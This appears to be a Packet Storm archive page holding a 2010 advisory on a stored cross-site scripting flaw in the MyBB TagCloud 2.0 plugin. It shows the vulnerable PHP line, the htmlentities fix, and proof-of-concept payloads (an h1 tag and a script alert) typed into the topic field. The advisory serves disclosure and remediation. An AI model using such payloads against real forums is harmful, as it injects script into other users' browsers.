exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MyBB TagCloud 2.0 Cross Site Scripting

MyBB TagCloud 2.0 Cross Site Scripting
Posted Aug 11, 2010
Site 3ethicalhackers.com

MyBB TagCloud version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | f70983856ea48fb4db52dc9d46f3ec08a266e8f21982f924e292bc447d5a2dd5

MyBB TagCloud 2.0 Cross Site Scripting

Change Mirror Download
====================================================
MYBB TagCloud 2.0 cross site scripting vulnerability
====================================================

Author: http://www.3ethicalhackers.com
Discovered by: http://www.3ethicalhackers.com
Original post: http://www.3ethicalhackers.com
=====================================================================

Description:

MYBB TagCloud 2.0 is an open source plugin, it is used to to show all recent posts.

How to exploit:
Enter html or javascript into topic field, once tagcloud displays the thread it will execute the malicious code
that was set within the topic field.

Download Link: http://www.mybbcentral.com/thread-1681.html
Number of times downloaded: 402

=====================================================================

[ vuln code ]

$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".$thread['subject']."</span></a> |\r\n";

[ Fixed Code ]

$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".htmlentities($thread['subject'])."</span></a> |\r\n";
=====================================================================

[ proof of concept ]

Topic Field: <h1>LOLIMADEEVERYTHINGBIG!

^once tagcloud displays that piece of code, everything within the tagcloud will become huge ;D

Topic Field: <script>javascript:alert("lolcats")</script>

^once tagcloud displays that piece of code, a message will pop up saying "lolcats"

======================================================================

JOIN US IN IRC
IRC.SMASHTHESTACK.ORG #3ETHICAL
FORUMS @ 3ETHICALHACKERS.COM

=========================| -=[ E0F ]=- |=================================
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close